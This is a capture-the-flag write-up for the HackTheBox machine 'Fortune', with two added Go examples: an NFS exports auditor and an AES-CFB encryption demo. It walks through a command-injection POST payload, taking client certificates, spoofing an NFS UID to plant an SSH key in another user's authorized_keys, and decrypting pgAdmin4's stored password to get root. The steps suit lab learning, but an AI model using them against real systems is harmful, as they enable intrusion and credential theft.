After visiting port 80 I am greeted with this interesting page
I try a few submissions and notice nothing of interest, so I attempt malicious POST requests in addition to the radio box option chosen. The vulnerability appears to be remote code execution, which was discovered by adding a semicolon to finish the command and execute a new one
curl -X POST -d 'db=fortunes;id' http://10.10.10.127/select
I get more of the random information alongside the output of my 'id' command
Unfortunately, more than 6 reverse shell methods did not work, potentially due to firewall settings. As much as I like to use Burpsuite or cURL to continue my commands, navigating an operating system is not going to be fun while repeating the same request and substituting the POST data. I initially attempted to look for private keys in the home directories but, as I did not have permissions to access them, I decided to write my own pseudo-shell script in Python with an exfiltration command to save files of interest
And to continue my reconnaissance I scout the home directories
ls -Rlash /home
I discover an interesting certificate authority directory in Bob's home directory which is filled with certificates and private keys. Remembering that port 443 is open, I decide to check from my machine whether client browser certificates are required for that service
openssl s_client -connect 10.10.10.127:443
Verify return code: 20 (unable to get local issuer certificate)
And that confirms my theory. So I need to grab a certificate and private key pair to see what is being served on port 443.
During my enumeration I discovered user accounts with shells
After some browsing I discover the pair that I can read so I save them locally using my script (shell.py)
I should be able to use these as-is, but for a browser such as Firefox their format needs to be converted from PEM to PKCS12 locally
openssl pkcs12 -export -inkey intermediate.key.pem -in intermediate.cert.pem -out intermediate.pkcs12.pfx
Firefox -> Preferences -> Search -> Certificates -> View Certificates -> Your Certificates -> Import -> intermediate.pkcs12.pfx
https://10.10.10.127
You will need to use the local authpf service to obtain elevated network access. If you do not already have the appropriate SSH key pair, then you will need to generate one and configure your local system appropriately to proceed.
Being in a mood for scripting, I decided to make a script to save the private key from the generation page rather than: copy to clipboard -> remove new lines (\n) -> save to a file -> change file permissions for my OpenSSH client to not complain about the key being too accessible
I attempt to use this key for all accounts but it is only authorized for the nfsuser account
ssh -i exported-id_rsa nfsuser@10.10.10.127
This is not really a shell, as I saw in the passwd file. This tunnel elevates my network privileges: essentially, I now have access to more ports that were previously inaccessible to unauthenticated users
The NFS service is now "unlocked".
I did not have the packages for common NFS tools installed on my Kali machine
apt install -y nfs-common
To see mounted NFS directories
showmount -e 10.10.10.127
Export list for 10.10.10.127:
To mount the /home shared directory
mount -t nfs 10.10.10.127:/home fortunehome
To un-mount (when the directory is no longer needed later on)
umount -lf fortunehome
ls -la fortunehome
drwxr-x--- 3 1000 1000 512 Nov 5 2018 charlie
NFS shares on Linux sometimes have a serious security issue: the server does not verify who the client user is, it simply trusts the numeric UID and GID the client presents. What I mean is that any user on a machine that has mounted this directory with a UID of 1000 or a GID of 1000 has access to it, even if no account with that UID exists on the server running the NFS service
If you have a user account with a UID of 1000 you can change to that user to access Charlie's home directory
su $(grep ':1000:1000:' /etc/passwd | cut -d ':' -f1)
I do not have any users on my local computer with that UID (1000 and above are normal user accounts) so I have to make one
useradd --uid 1000 --shell /bin/bash evilcharlie
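The UID-trust problem described above, shown as an added Go example that is not part of the original post: it parses a constructed Linux exports(5) sample (not the target's real configuration) and flags entries where the server honours client-supplied UIDs and GIDs (no all_squash) or keeps client root as root (no_root_squash). Function and type names are my own.

```go
package main

import "strings"

// Constructed sample of a Linux exports(5) file, not the target's real config. The last
// line shows the classic "space before (rw)" mistake: /data is then also exported to every host.
const sampleExports = `# constructed sample
/home        10.10.10.0/24(rw,sync)
/srv/public  10.10.10.0/24(ro,all_squash,anonuid=65534,anongid=65534)
/data        10.10.14.3(rw,no_root_squash) (rw)
`

// Finding is one export/client pair whose options let the client pick its own identity.
type Finding struct {
	Path, Client string
	Reasons      []string
}
// auditExports flags entries where the server trusts client UID/GID as-is (no all_squash)
// or keeps client root as root (no_root_squash); an all_squash entry is mapped to anonuid/anongid.
func auditExports(content string) []Finding {
	var out []Finding
	for _, line := range strings.Split(content, "\n") {
		fields := strings.Fields(strings.SplitN(line, "#", 2)[0])
		if len(fields) == 0 {
			continue
		}
		for _, spec := range fields[1:] {
			client, opts := spec, ""
			if i := strings.Index(spec, "("); i >= 0 && strings.HasSuffix(spec, ")") {
				client, opts = spec[:i], spec[i+1:len(spec)-1]
			}
			if client == "" {
				client = "*" // exports(5): options without a host apply to every host
			}
			hasOpt := func(o string) bool { return strings.Contains(","+opts+",", ","+o+",") }
			var why []string
			if !hasOpt("all_squash") {
				why = append(why, "no all_squash: client UID/GID trusted as-is")
			}
			if hasOpt("no_root_squash") {
				why = append(why, "no_root_squash: client root is root on the share")
			}
			if len(why) > 0 {
				out = append(out, Finding{fields[0], client, why})
			}
		}
	}
	return out
}
```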
At this point I have access to Charlie's home directory, so I am able to establish a solid foothold by whitelisting my SSH public key and using the private key associated with that public key to log in as Charlie
cat ~/.ssh/id_rsa.pub >> fortunehome/charlie/.ssh/authorized_keys
ssh -i ~/.ssh/id_rsa charlie@10.10.10.127
Thanks for setting-up pgadmin4 for me. Seems to work great so far.
BTW: I set the dba password to the same as root. I hope you don't mind.
This message from Bob gives me a hint for obtaining root: I would have to crack the local PostgreSQL server's dba account password or find it being used in a script or configuration file somewhere.
I decided to narrow down my search
find / -name 'pgadmin4' -ls 2>/dev/null
Of the entries found, this was one that stood out to me
ls -la /var/appsrv/pgadmin4
I found what appears to be a database file
I decide to grab this database file from my machine
scp -i ~/.ssh/id_rsa charlie@10.10.10.127:/var/appsrv/pgadmin4/pgadmin4.db pgadmin4.db
One good tool to browse database files is DB Browser for SQLite which is already installed on my Kali machine
I noticed three tables that were interesting while browsing the data
I attempt to crack those hashes using hashcat, but as I did not quickly discover the password in a common password list such as rockyou.txt, I decided that was not the route to privilege escalation. The next option was to find a way to decrypt those ciphertexts using the information available.
The other directory that stood out to me in that find command was this one
This tool's source code appears to be publicly available on GitHub, which I discovered from a README file, so I decided to download it to my machine
git clone https://github.com/postgres/pgadmin4
I decide to find the component used for encryption in this application
egrep -Ril 'encrypt|decrypt' pgadmin4
This File Provides Cryptography.
Well that was quick!
def encrypt(plaintext, key)
def decrypt(ciphertext, key)
I decide to try both PBKDF2 SHA512 hashes I found earlier as the key, as hashing algorithms are often used to store password hashes and those hashes are often used in the encryption process. Bob's user hash had a successful trial.
Here is a simplified example in pseudo-code if you are not familiar or comfortable with cryptography.
AES encrypt('Password123', SHA256('Some other secret password'))
Which translates to
AES encrypt('Password123', '720d7aba7095f0269ee2e314350ee00433bb3d579b4b5775bed4260b81373367')
Which outputs the ciphertext of
As AES is a symmetric-key algorithm, it can be decrypted with the correct key
Which outputs the plaintext of
So I decided to grab only the required functions for decryption and put them in a quick script
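The simplified scheme above (AES keyed with a hash of another secret), as an added Go example that is neither the post's script nor pgAdmin4's own code: AES-CFB with a random IV under SHA256(secret), with the matching decrypt. Function names are my own, and the pseudo-code's SHA256 digest is used directly as the AES-256 key.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"errors"
	"io"
)

// keyFromSecret is the post's SHA256('Some other secret password') step: the 32-byte digest is the AES-256 key.
func keyFromSecret(secret string) []byte {
	sum := sha256.Sum256([]byte(secret))
	return sum[:]
}

// encryptSecret returns base64(iv || AES-CFB(plaintext)) with a fresh random IV, so equal inputs encrypt differently.
func encryptSecret(plaintext, secret string) (string, error) {
	block, err := aes.NewCipher(keyFromSecret(secret))
	if err != nil {
		return "", err
	}
	buf := make([]byte, aes.BlockSize+len(plaintext))
	if _, err := io.ReadFull(rand.Reader, buf[:aes.BlockSize]); err != nil {
		return "", err
	}
	cipher.NewCFBEncrypter(block, buf[:aes.BlockSize]).XORKeyStream(buf[aes.BlockSize:], []byte(plaintext))
	return base64.StdEncoding.EncodeToString(buf), nil
}

// decryptSecret reverses encryptSecret. It rejects malformed input, but CFB carries no
// authentication tag, so a wrong key yields garbage rather than an error.
func decryptSecret(ciphertext, secret string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(ciphertext)
	if err != nil {
		return "", err
	}
	if len(raw) < aes.BlockSize {
		return "", errors.New("ciphertext shorter than one IV block")
	}
	block, err := aes.NewCipher(keyFromSecret(secret))
	if err != nil {
		return "", err
	}
	out := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCFBDecrypter(block, raw[:aes.BlockSize]).XORKeyStream(out, raw[aes.BlockSize:])
	return string(out), nil
}
```

Because the key is derived only from data that sits in the same database as the ciphertext, anyone who can read that database can call decryptSecret; the scheme hides passwords from a casual look, not from a copy of the file.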
As Bob mentioned in his note to Charlie, the PostgreSQL password is the same as the root password
cat /home/charlie/user.txt /root/root.txt
I had a lot of fun writing scripts for this machine. I hope you enjoyed it as much as I did! :) Thanks for this cool box AuxSarge!